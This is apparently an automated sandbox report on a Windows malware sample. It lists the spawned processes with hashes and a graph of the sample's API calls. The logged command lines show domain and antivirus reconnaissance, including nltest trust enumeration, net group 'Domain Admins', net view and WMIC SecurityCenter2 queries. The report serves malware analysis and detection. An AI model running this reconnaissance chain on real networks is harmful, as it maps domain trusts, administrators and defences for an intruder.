                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:11:45:03
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c nltest /domain_trusts
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:11:45:03
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:11:45:03
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\nltest.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:nltest /domain_trusts
                                                                                                                                                                              Imagebase:0x7ff7b5590000
                                                                                                                                                                              File size:540'672 bytes
                                                                                                                                                                              MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:11:45:04
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c nltest /domain_trusts /all_trusts
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:22
                                                                                                                                                                              Start time:11:45:04
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:23
                                                                                                                                                                              Start time:11:45:04
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\nltest.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:nltest /domain_trusts /all_trusts
                                                                                                                                                                              Imagebase:0x7ff7b5590000
                                                                                                                                                                              File size:540'672 bytes
                                                                                                                                                                              MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:11:45:04
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c net view /all /domain
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:25
                                                                                                                                                                              Start time:11:45:04
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:26
                                                                                                                                                                              Start time:11:45:04
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\net.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:net view /all /domain
                                                                                                                                                                              Imagebase:0x7ff765000000
                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                              MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:27
                                                                                                                                                                              Start time:11:45:17
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c net view /all
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:28
                                                                                                                                                                              Start time:11:45:17
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:29
                                                                                                                                                                              Start time:11:45:17
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\net.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:net view /all
                                                                                                                                                                              Imagebase:0x7ff765000000
                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                              MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:11:45:30
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c net group "Domain Admins" /domain
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:31
                                                                                                                                                                              Start time:11:45:30
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:32
                                                                                                                                                                              Start time:11:45:30
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\net.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:net group "Domain Admins" /domain
                                                                                                                                                                              Imagebase:0x7ff765000000
                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                              MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:33
                                                                                                                                                                              Start time:11:45:30
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\net1.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\net1 group "Domain Admins" /domain
                                                                                                                                                                              Imagebase:0x7ff6cf6b0000
                                                                                                                                                                              File size:183'808 bytes
                                                                                                                                                                              MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:34
                                                                                                                                                                              Start time:11:45:30
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                                                                                                                                                                              Imagebase:0x7ff7a7bd0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:35
                                                                                                                                                                              Start time:11:45:30
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:36
                                                                                                                                                                              Start time:11:45:31
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c net config workstation
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:37
                                                                                                                                                                              Start time:11:45:31
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:38
                                                                                                                                                                              Start time:11:45:31
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\net.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:net config workstation
                                                                                                                                                                              Imagebase:0x7ff765000000
                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                              MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:39
                                                                                                                                                                              Start time:11:45:31
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\net1.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\net1 config workstation
                                                                                                                                                                              Imagebase:0x7ff6cf6b0000
                                                                                                                                                                              File size:183'808 bytes
                                                                                                                                                                              MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:40
                                                                                                                                                                              Start time:11:45:32
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:41
                                                                                                                                                                              Start time:11:45:32
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:42
                                                                                                                                                                              Start time:11:45:32
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                                                                                                                                                                              Imagebase:0x7ff7a7bd0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:43
                                                                                                                                                                              Start time:11:45:32
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:findstr /V /B /C:displayName
                                                                                                                                                                              Imagebase:0x7ff7129c0000
                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:44
                                                                                                                                                                              Start time:11:45:32
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c whoami /groups
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:45
                                                                                                                                                                              Start time:11:45:32
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:46
                                                                                                                                                                              Start time:11:45:32
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\whoami.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:whoami /groups
                                                                                                                                                                              Imagebase:0x7ff6255f0000
                                                                                                                                                                              File size:73'728 bytes
                                                                                                                                                                              MD5 hash:A4A6924F3EAF97981323703D38FD99C4
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:1.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:38.3%
                                                                                                                                                                                Total number of Nodes:389
                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                execution_graph 32646 cd3084 32647 cd3090 __FrameHandler3::FrameUnwindToState 32646->32647 32672 cd2de4 32647->32672 32649 cd3097 32650 cd31ea 32649->32650 32658 cd30c1 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 32649->32658 32706 cd33a8 4 API calls 2 library calls 32650->32706 32652 cd31f1 32707 ce2ed9 23 API calls __FrameHandler3::FrameUnwindToState 32652->32707 32654 cd31f7 32708 ce2e9d 23 API calls __FrameHandler3::FrameUnwindToState 32654->32708 32656 cd31ff 32657 cd30e0 32658->32657 32662 cd3161 32658->32662 32705 ce2eb3 41 API calls 3 library calls 32658->32705 32660 cd3167 32684 cbcdb0 GetCommandLineW 32660->32684 32683 cd34c3 GetStartupInfoW codecvt 32662->32683 32673 cd2ded 32672->32673 32709 cd35a9 IsProcessorFeaturePresent 32673->32709 32675 cd2df9 32710 cd58dc 10 API calls 2 library calls 32675->32710 32677 cd2dfe 32678 cd2e02 32677->32678 32711 ce393e 32677->32711 32678->32649 32681 cd2e19 32681->32649 32683->32660 32685 cbcdf8 32684->32685 32770 cb1f80 LocalAlloc 32685->32770 32687 cbce09 32771 cb69a0 32687->32771 32689 cbce58 32690 cbce69 32689->32690 32691 cbce5c 32689->32691 32779 cbc6a0 LocalAlloc LocalAlloc 32690->32779 32861 cb6600 98 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 32691->32861 32694 cbce65 32696 cbceb0 ExitProcess 32694->32696 32695 cbce72 32780 cbc870 32695->32780 32701 cbce9a 32862 cbcce0 CreateFileW SetFilePointer WriteFile CloseHandle 32701->32862 32702 cbcea4 32863 cbcec0 LocalFree LocalFree 32702->32863 32705->32662 32706->32652 32707->32654 32708->32656 32709->32675 32710->32677 32715 cebedb 32711->32715 32714 cd58fb 7 API calls 2 library calls 32714->32678 32716 cebeeb 32715->32716 32717 cd2e0b 32715->32717 32716->32717 32719 ce6d2d 32716->32719 32717->32681 32717->32714 32720 ce6d39 __FrameHandler3::FrameUnwindToState 32719->32720 32731 ce1c9a EnterCriticalSection 32720->32731 32722 ce6d40 32732 cec4cc 32722->32732 32727 ce6d6f 32727->32716 32728 ce6d59 32746 ce6c7d GetStdHandle GetFileType 32728->32746 32730 ce6d5e 32747 ce6d84 LeaveCriticalSection std::_Lockit::~_Lockit 32730->32747 32731->32722 32733 cec4d8 __FrameHandler3::FrameUnwindToState 32732->32733 32734 cec502 32733->32734 32735 cec4e1 32733->32735 32748 ce1c9a EnterCriticalSection 32734->32748 32756 cd7370 14 API calls __dosmaperr 32735->32756 32738 cec4e6 32757 cd7017 41 API calls ___std_exception_copy 32738->32757 32740 cec53a 32758 cec561 LeaveCriticalSection std::_Lockit::~_Lockit 32740->32758 32741 ce6d4f 32741->32730 32745 ce6bc7 44 API calls 32741->32745 32742 cec50e 32742->32740 32749 cec41c 32742->32749 32745->32728 32746->32730 32747->32727 32748->32742 32759 ce70bb 32749->32759 32751 cec42e 32755 cec43b 32751->32755 32766 ce776f 6 API calls std::_Locinfo::_Locinfo_ctor 32751->32766 32753 cec490 32753->32742 32767 ce53b8 14 API calls __dosmaperr 32755->32767 32756->32738 32757->32741 32758->32741 32760 ce70c8 __cftoe 32759->32760 32761 ce7108 32760->32761 32762 ce70f3 RtlAllocateHeap 32760->32762 32768 cebf83 EnterCriticalSection LeaveCriticalSection __cftoe 32760->32768 32769 cd7370 14 API calls __dosmaperr 32761->32769 32762->32760 32764 ce7106 32762->32764 32764->32751 32766->32751 32767->32753 32768->32760 32769->32764 32770->32687 32772 cb69f2 32771->32772 32773 cb6a34 32772->32773 32776 cb6a22 32772->32776 32774 cd2937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 32773->32774 32775 cb6a42 32774->32775 32775->32689 32864 cd2937 32776->32864 32778 cb6a30 32778->32689 32779->32695 32781 cbc889 32780->32781 32785 cbcb32 32780->32785 32782 cbcb92 32781->32782 32781->32785 32872 cb6250 14 API calls 32782->32872 32784 cbcba2 RegOpenKeyExW 32784->32785 32786 cbcbc0 RegQueryValueExW 32784->32786 32787 cb6a50 32785->32787 32786->32785 32788 cb6aa3 GetCurrentProcess OpenProcessToken 32787->32788 32789 cb6a84 32787->32789 32793 cb6b09 32788->32793 32794 cb6adf 32788->32794 32790 cd2937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 32789->32790 32791 cb6a9f 32790->32791 32791->32701 32791->32702 32873 cb5de0 32793->32873 32795 cb6b02 32794->32795 32796 cb6af4 CloseHandle 32794->32796 32921 cb57c0 GetCurrentProcess OpenProcessToken 32795->32921 32796->32795 32800 cb6b2e 32804 cb6b3f 32800->32804 32805 cb6b32 32800->32805 32801 cb6b20 32803 cb1770 42 API calls 32801->32803 32802 cb6c29 32806 cb6ddb 32802->32806 32811 cb6c43 32802->32811 32803->32794 32876 cb5f40 ConvertSidToStringSidW 32804->32876 32807 cb1770 42 API calls 32805->32807 32809 cb2310 56 API calls 32806->32809 32807->32794 32812 cb6e04 32809->32812 32926 cb2310 32811->32926 32818 cb46f0 52 API calls 32812->32818 32860 cb6d8a 32812->32860 32821 cb6e29 32818->32821 32819 cb6b85 32907 cb2e60 32819->32907 32823 cb6e59 32821->32823 33008 cb4ac0 42 API calls 3 library calls 32821->33008 32826 cb2310 56 API calls 32823->32826 32824 cb2e60 42 API calls 32827 cb6bf5 32824->32827 32832 cb6e68 32826->32832 32913 cb1770 32827->32913 32829 cb6cad 32830 cb2310 56 API calls 32829->32830 32834 cb6cc7 32830->32834 32838 cb46f0 52 API calls 32832->32838 32832->32860 32840 cb46f0 52 API calls 32834->32840 32834->32860 32835 cb6c16 CloseHandle 32835->32795 32836 cb6c7c 32836->32829 33005 cb4ac0 42 API calls 3 library calls 32836->33005 32842 cb6e8a 32838->32842 32839 cb6eb9 32841 cb2310 56 API calls 32839->32841 32847 cb6ce9 32840->32847 32843 cb6ec4 32841->32843 32842->32839 33009 cb4ac0 42 API calls 3 library calls 32842->33009 32850 cb46f0 52 API calls 32843->32850 32843->32860 32844 cb6d19 32845 cb2310 56 API calls 32844->32845 32848 cb6d24 32845->32848 32847->32844 32847->32847 33006 cb4ac0 42 API calls 3 library calls 32847->33006 32852 cb46f0 52 API calls 32848->32852 32848->32860 32854 cb6ee6 32850->32854 32851 cb6f10 33011 cb52f0 32851->33011 32858 cb6d46 32852->32858 32854->32851 33010 cb4ac0 42 API calls 3 library calls 32854->33010 32855 cb6d70 32959 cb4ba0 32855->32959 32858->32855 33007 cb4ac0 42 API calls 3 library calls 32858->33007 33058 cb11d0 RaiseException Concurrency::cancel_current_task 32860->33058 32861->32694 32862->32702 32863->32696 32865 cd293f 32864->32865 32866 cd2940 IsProcessorFeaturePresent 32864->32866 32865->32778 32868 cd29a5 32866->32868 32871 cd2968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32868->32871 32870 cd2a88 32870->32778 32871->32870 32872->32784 33059 cb5e40 GetTokenInformation 32873->33059 32877 cb5fac 32876->32877 32878 cb5fd2 32876->32878 32880 cb24c0 47 API calls 32877->32880 32879 cb24c0 47 API calls 32878->32879 32883 cb5fc9 32879->32883 32880->32883 32881 cb6003 32884 cb24c0 32881->32884 32882 cb5ff5 LocalFree 32882->32881 32883->32881 32883->32882 32888 cb24d1 codecvt 32884->32888 32889 cb24fd 32884->32889 32885 cb25f5 33070 cb2770 42 API calls 32885->33070 32886 cb2515 32891 cb25f0 32886->32891 32892 cb2566 LocalAlloc 32886->32892 32888->32819 32889->32885 32889->32886 32889->32891 32894 cb2582 32889->32894 32890 cb25fa 33071 cd7027 41 API calls 2 library calls 32890->33071 33069 cb2d70 RaiseException Concurrency::cancel_current_task 32891->33069 32892->32890 32896 cb2577 32892->32896 32900 cb2593 codecvt 32894->32900 32901 cb2586 LocalAlloc 32894->32901 32896->32900 32900->32890 32904 cb25e5 32900->32904 32905 cb25d8 32900->32905 32901->32900 32904->32819 32905->32904 32906 cb25de LocalFree 32905->32906 32906->32904 32908 cb2e8d 32907->32908 32909 cb2eb7 32907->32909 32908->32907 32910 cb2eaa 32908->32910 33072 cd7027 41 API calls 2 library calls 32908->33072 32909->32824 32910->32909 32911 cb2eb0 LocalFree 32910->32911 32911->32909 32914 cb179b 32913->32914 32915 cb17c1 32913->32915 32916 cb17ba LocalFree 32914->32916 32917 cb17e5 32914->32917 32918 cb17b4 32914->32918 32915->32795 32915->32835 32916->32915 33073 cd7027 41 API calls 2 library calls 32917->33073 32918->32915 32918->32916 32922 cb57e1 32921->32922 32923 cb57e7 GetTokenInformation 32921->32923 32922->32802 32924 cb581e CloseHandle 32923->32924 32925 cb5816 32923->32925 32924->32802 32925->32924 32927 cb2348 32926->32927 32928 cb239c 32926->32928 33074 cd2c98 6 API calls 32927->33074 32940 cb2427 32928->32940 33077 cd2c98 6 API calls 32928->33077 32930 cb2352 32930->32928 32932 cb235e GetProcessHeap 32930->32932 33075 cd2faa 44 API calls 32932->33075 32933 cb23b6 32933->32940 33078 cd2faa 44 API calls 32933->33078 32936 cb238b 33076 cd2c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32936->33076 32937 cb2416 33079 cd2c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32937->33079 32940->32860 32941 cb46f0 32940->32941 32942 cb4700 32941->32942 32944 cb4766 32941->32944 32942->32944 33080 cbd156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 32942->33080 32944->32836 32945 cb4730 FindResourceExW 32946 cb471a 32945->32946 32946->32944 32946->32945 32949 cb4771 32946->32949 33081 cb45b0 LoadResource LockResource SizeofResource 32946->33081 33082 cbd156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 32946->33082 32949->32944 32950 cb4775 FindResourceW 32949->32950 32950->32944 32951 cb4783 32950->32951 33083 cb45b0 LoadResource LockResource SizeofResource 32951->33083 32953 cb4790 32953->32944 33084 cd7383 41 API calls 3 library calls 32953->33084 